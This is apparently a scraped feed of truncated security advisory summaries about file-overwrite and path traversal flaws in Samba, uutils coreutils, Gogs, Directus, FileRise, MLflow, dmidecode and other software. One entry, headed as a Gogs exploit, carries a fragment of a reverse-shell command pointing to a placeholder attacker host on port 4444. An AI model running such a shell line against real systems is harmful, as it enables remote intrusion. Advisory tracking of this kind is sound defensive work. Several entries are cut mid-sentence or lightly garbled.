CVE-2026-2340 Samba: vfs_worm does not block directory modification

A flaw was found in Samba’s vfsworm module. The module is intended to provide write-once, read-many WORM protections by preventing modification of files after a configurable grace period. Due to insufficient validation during rename operations, an authenticated user with write access to a share...

CVE-2026-35364

A flaw was found in the mv utility of uutils coreutils. A local attacker with write access to a destination directory can exploit a Time-of-Check to Time-of-Use TOCTOU race condition during cross-device file operations. This allows the attacker to replace the intended destination with a symbolic...

CLSA-2026-1777040413 dmidecode: Fix of CVE-2023-30630

CVE-2023-30630: do not let --dump-bin overwrite an existing file...

Exploit for Path Traversal in Gogs

CVE-2025-8110 — Gogs & /dev/tcp/ATTACKER/4444 0&1"' Cleanu...

CVE-2026-39942

Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, the PATCH /files/id endpoint accepts a user-controlled filenamedisk parameter. By setting this value to match the storage path of another user's file, an attacker can overwrite that file's content...

CVE-2026-39942

CVE-2026-39942 (Directus) is a path traversal/broken access control issue in the Directus file management API. Prior to 11.17.0, the PATCH /files/{id} endpoint accepts a user-controlled filename_disk parameter. An attacker can set filename_disk to the storage path of another user’s file, allowing...

PT-2026-31648

Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, the PATCH /files/id endpoint accepts a user-controlled filename disk parameter. By setting this value to match the storage path of another user's file, an attacker can overwrite that file's content...

PT-2026-28645

Name of the Vulnerable Software and Affected Versions NEC Platforms, Ltd. Aterm Series affected versions not specified Description A path traversal flaw exists in NEC Platforms, Ltd. Aterm Series, potentially allowing an attacker to overwrite any file through network access. Recommendations At th...

CVE-2026-33330

FileRise is a self-hosted web file manager / WebDAV server. Prior to version 3.10.0, a broken access control issue in FileRise's ONLYOFFICE integration allows an authenticated user with read-only access to obtain a signed save callbackUrl for a file and then directly forge the ONLYOFFICE save...

PT-2026-27491

FileRise is a self-hosted web file manager / WebDAV server. Prior to version 3.10.0, a broken access control issue in FileRise's ONLYOFFICE integration allows an authenticated user with read-only access to obtain a signed save callbackUrl for a file and then directly forge the ONLYOFFICE save...

CVE-2025-41736

A low privileged remote attacker can upload a new or overwrite an existing python script by using a path traversal of the target filename in php resulting in a remote code execution...

UBUNTU-CVE-2025-57567

A remote code execution RCE vulnerability exists in the PluXml CMS theme editor, specifically in the minify.php file located under the default theme directory /themes/defaut/css/minify.php. An authenticated administrator user can overwrite this file with arbitrary PHP code via the admin panel,...

CVE-2025-45586

An issue in Audi UTR 2.0 Universal Traffic Recorder 2.0 allows attackers to arbitrarily overwrite files via supplying a crafted PUT request...

PT-2025-1792 · WordPress · Seo Lat Auto Post

Name of the Vulnerable Software and Affected Versions: SEO LAT Auto Post plugin for WordPress versions up to 2.2.1 Description: The issue is related to a missing capability check on the remote update AJAX action, which allows unauthenticated attackers to overwrite the seo-beginner-auto-post.php...

CVE-2024-43705

CVE-2024-43705 affects Imagination Technologies PowerVR-GPU (Imagination GPU Driver). The issue stems from a vulnerability in the GPU kernel driver where PVRSRVBridgePhysmemWrapExtMem can write to arbitrary read-only system files mapped into application memory, allowing a non-privileged user to p...

Path traversal

An absolute path traversal attack exists in the Ansible automation platform. This flaw allows an attacker to craft a malicious Ansible role and make the victim execute the role. A symlink can be used to overwrite a file outside of the extraction path...

CVE-2023-6018

An attacker can overwrite any file on the server hosting MLflow without any authentication...

Oracle Linux 8 : dmidecode (ELSA-2023-5252)

The remote Oracle Linux 8 host has a package installed that is affected by a vulnerability as referenced in the ELSA-2023-5252 advisory. 1:3.3-4.1 - Resolves: CVE-2023-30630 Tenable has extracted the preceding description block directly from the Oracle Linux security advisory. Note that Nessus ha...

Huawei EulerOS: Security Advisory for dmidecode (EulerOS-SA-2023-2329)

The remote host is missing an update for the Huawei EulerOS SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

EulerOS 2.0 SP9 : dmidecode (EulerOS-SA-2023-2329)

According to the versions of the dmidecode package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - Dmidecode before 3.5 allows -dump-bin to overwrite a local file. This has security relevance because, for example, execution of Dmidecode via...